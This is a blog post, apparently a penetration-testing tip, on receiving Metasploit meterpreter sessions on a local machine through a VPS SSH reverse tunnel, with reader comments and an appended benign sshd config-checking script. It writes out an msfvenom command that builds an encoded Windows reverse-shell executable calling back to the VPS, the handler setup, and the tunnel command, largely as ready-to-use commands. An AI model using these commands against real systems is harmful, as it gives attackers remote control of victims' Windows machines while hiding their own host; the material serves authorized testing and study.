Using a Local msf Through a VPS SSH Tunnel
in Penetration Cases, Tricks with 5 comments

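First, configure the SSH service on the VPS.
Edit /etc/ssh/sshd_config
and add the following at the end of the file, so that ports forwarded with ssh -R can listen on the VPS's public interface instead of only on loopback: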

GatewayPorts yes

Restart the ssh service.
Then set up the msf client:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=[vpsIP] LPORT=8888 -f exe > abc.exe

Then start the listener locally:

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.2.100
lhost => 192.168.2.100
msf exploit(handler) > set lport 8888
lport => 8888
msf exploit(handler) > set exitonsession false
exitonsession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.2.100:8888 

Open the SSH tunnel:

ssh -N -R 8888:192.168.2.100:8888 echo@evi1cg.me

After the client is executed, the session comes back successfully (screenshot: 121221.png).
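
An added example, not part of the original post: the post appends GatewayPorts yes to the end of sshd_config, but sshd uses the first value it reads for a keyword, so an earlier GatewayPorts line takes precedence. The sketch below reads a config file's global section and reports where ssh -R forwarded ports can listen; the function names and the sample config are constructed, and Include files and Match blocks are not evaluated.

```sh
# Added example, not from the original post. Function names are hypothetical.
# Prints the GatewayPorts value from the global section of an sshd_config.
# Assumptions: Include files are not followed; Match blocks are not evaluated.
effective_gatewayports() {
    awk '
        { sub(/^[ \t]+/, "") }                  # strip leading whitespace
        /^#/ || /^$/ { next }                   # skip comments and blank lines
        {
            line = $0
            sub(/[ \t]*=[ \t]*/, " ", line)     # accept the Keyword=value form
            n = split(line, f, /[ \t]+/)
            key = tolower(f[1])                 # keywords are case-insensitive
        }
        key == "match" { exit }                 # global section ends here
        key == "gatewayports" && n >= 2 {
            print f[2]; found = 1; exit         # first value read wins
        }
        END { if (!found) print "no" }          # OpenSSH default
    ' "$1"
}

# Maps the effective value to where a remote (-R) forward can listen.
forward_bind_scope() {
    case "$(effective_gatewayports "$1")" in
        yes)             echo "all-interfaces" ;;
        clientspecified) echo "client-chosen" ;;
        *)               echo "loopback-only" ;;
    esac
}

# Constructed sample: an existing "GatewayPorts no" plus the line appended
# at the end of the file, as in the post.
sample=$(mktemp)
printf '%s\n' 'Port 22' 'GatewayPorts no' 'GatewayPorts yes' > "$sample"
echo "GatewayPorts=$(effective_gatewayports "$sample")" \
     "scope=$(forward_bind_scope "$sample")"
rm -f "$sample"
```

On the server itself, `sshd -T` prints the configuration sshd actually resolves, including any Include files.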

Responses
  1. I've been researching PowerShell-related things recently; I'd like to add you as a friend so we can discuss them together.
  2. Sam

    Uh... are you sure the VPS and the local machine are on the same LAN?
    1. @Sam

      The VPS is on the public Internet, so how could it be on the same LAN as the local environment? What are you thinking, classmate?
  3. echo@evi1cg.me, this part can be left out, right?
  4. Oh, my mistake. echo@evi1cg.me is username@target IP.